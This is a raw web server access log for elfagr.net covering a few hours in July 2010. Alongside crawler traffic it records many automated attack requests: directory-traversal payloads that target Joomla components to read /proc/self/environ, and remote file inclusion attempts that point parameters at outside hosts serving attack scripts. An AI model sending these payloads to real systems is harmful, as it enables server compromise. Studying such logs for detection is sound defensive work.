95.108.150.235 - - [03/Jul/2010:00:14:32 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "elfagr.net"
95.108.150.235 - - [03/Jul/2010:00:14:32 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.elfagr.net"
95.108.150.235 - - [03/Jul/2010:00:14:33 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.elfagr.net"
62.149.14.44 - - [03/Jul/2010:00:15:33 -0700] "GET /logs/access_100121.log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
62.149.14.44 - - [03/Jul/2010:00:15:33 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
62.149.14.44 - - [03/Jul/2010:00:15:33 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
38.113.115.196 - - [03/Jul/2010:00:27:02 -0700] "GET /logs/access_100121.log//web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
38.113.115.196 - - [03/Jul/2010:00:27:02 -0700] "GET /web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
38.113.115.196 - - [03/Jul/2010:00:27:03 -0700] "GET /logs//web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
114.141.196.221 - - [03/Jul/2010:00:38:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
114.141.196.221 - - [03/Jul/2010:00:38:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
38.113.115.196 - - [03/Jul/2010:00:38:54 -0700] "GET /logs/access_100121.log//web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
38.113.115.196 - - [03/Jul/2010:00:38:54 -0700] "GET /web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
38.113.115.196 - - [03/Jul/2010:00:39:05 -0700] "GET /logs//web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
114.141.196.221 - - [03/Jul/2010:00:44:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
190.254.58.196 - - [03/Jul/2010:00:50:47 -0700] "GET /logs//xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.elfagr.net"
190.254.58.196 - - [03/Jul/2010:00:50:37 -0700] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:00:59:43 -0700] "GET /logs/access_100121.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
67.218.116.169 - - [03/Jul/2010:01:04:01 -0700] "GET /logs/?M=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
202.70.58.197 - - [03/Jul/2010:01:30:24 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
202.70.58.197 - - [03/Jul/2010:01:30:33 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
202.70.58.197 - - [03/Jul/2010:01:30:25 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
202.70.58.197 - - [03/Jul/2010:01:30:54 -0700] "GET /logs/access_100701.log HTTP/1.1" 200 786432 "http://www.elfagr.net/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
112.78.8.91 - - [03/Jul/2010:01:37:28 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
112.78.8.91 - - [03/Jul/2010:01:37:41 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:45:15 -0700] "GET /logs//admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:45:15 -0700] "GET /logs/access_091224.log%20%20//admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:45:15 -0700] "GET /logs/access_091126.log%20%20//admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:45:26 -0700] "GET /admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:01:46:22 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:01:46:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:01:46:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:01:46:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:01:47:11 -0700] "GET /index_files/ HTTP/1.1" 200 7688 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:47:23 -0700] "GET /logs//admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:47:23 -0700] "GET /logs/access_091126.log%20%20//admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:47:23 -0700] "GET /admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.60.50 - - [03/Jul/2010:01:47:29 -0700] "GET /logs/access_091224.log%20%20//admin.jjgallery.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:01:56:02 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:57:47 -0700] "GET /logs//shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:57:47 -0700] "GET /shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:57:49 -0700] "GET /logs//shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:57:49 -0700] "GET /shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:57:53 -0700] "GET /logs//shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:58:04 -0700] "GET /shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:57:57 -0700] "GET /logs//shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.228.131.90 - - [03/Jul/2010:01:57:58 -0700] "GET /shops////?_SERVER[DOCUMENT_ROOT]=http://www.oakhillbaptist.com/.cok/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
67.195.111.171 - - [03/Jul/2010:02:07:24 -0700] "GET /index_files/?M=A HTTP/1.0" 200 7672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:02:26:31 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:02:26:32 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:02:27:06 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [03/Jul/2010:02:27:17 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:32:39 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:32:39 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
77.92.89.1 - - [03/Jul/2010:02:32:42 -0700] "GET /?abg_path=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 200 1465 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
77.92.89.1 - - [03/Jul/2010:02:32:42 -0700] "GET /logs/?abg_path=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 200 4799 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:32:53 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:32:53 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:32:55 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:32:55 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:02:33:15 -0700] "GET /logs/access_091231.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:33:45 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:34:18 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
93.116.221.167 - - [03/Jul/2010:02:39:15 -0700] "GET /logs/access_091203.log HTTP/1.0" 404 - "http://www.elfagr.net/logs/access_091203.log" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.elfagr.net"
93.116.221.167 - - [03/Jul/2010:02:39:16 -0700] "GET / HTTP/1.0" 200 1449 "http://www.elfagr.net/" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:01 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:53:51 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:11 -0700] "GET /logs/access_100121.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:21 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:11 -0700] "GET /logs/access_100121.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:11 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:11 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:11 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:54:55 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:55:01 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:57:27 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:57:37 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:57:27 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:57:35 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:57:36 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:02:57:46 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:15 -0700] "GET /logs/access_090528.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:40 -0700] "GET /logs/access_090604.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:31 -0700] "GET /logs/access_090611.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:33 -0700] "GET /logs/access_090618.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:35 -0700] "GET /logs/access_090625.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:36 -0700] "GET /logs/access_090702.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:38 -0700] "GET /logs/access_090709.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:40 -0700] "GET /logs/access_090716.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:52 -0700] "GET /logs/access_090723.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:03:03:43 -0700] "GET /logs/access_090730.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:05:37 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:05:48 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:05:39 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:05:39 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:06:48 -0700] "GET /logs/access_100121.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:06:48 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:06:38 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:06:51 -0700] "GET /logs/access_100121.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:06:51 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:06:52 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:03:07:25 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:03:07:35 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
66.71.245.122 - - [03/Jul/2010:03:10:38 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [03/Jul/2010:03:10:38 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [03/Jul/2010:03:10:38 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
67.218.116.169 - - [03/Jul/2010:03:11:05 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:11:09 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:11:09 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:11:43 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:11:33 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:14:23 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:14:23 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:14:13 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:14:26 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:14:26 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.234.215 - - [03/Jul/2010:03:14:16 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
77.221.137.18 - - [03/Jul/2010:03:14:34 -0700] "GET /logs/access_100520.log/errors.php?error=http://trege.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
77.221.137.18 - - [03/Jul/2010:03:14:35 -0700] "GET /errors.php?error=http://trege.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
77.221.137.18 - - [03/Jul/2010:03:14:35 -0700] "GET /logs//errors.php?error=http://trege.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
77.221.137.18 - - [03/Jul/2010:03:19:50 -0700] "GET /logs/access_100520.log/CBC.php?mosConfig_absolute_path=http://trege.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
77.221.137.18 - - [03/Jul/2010:03:19:50 -0700] "GET /CBC.php?mosConfig_absolute_path=http://trege.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
77.221.137.18 - - [03/Jul/2010:03:19:51 -0700] "GET /logs//CBC.php?mosConfig_absolute_path=http://trege.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:03:20:09 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:03:21:11 -0700] "GET /logs/access_100311.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
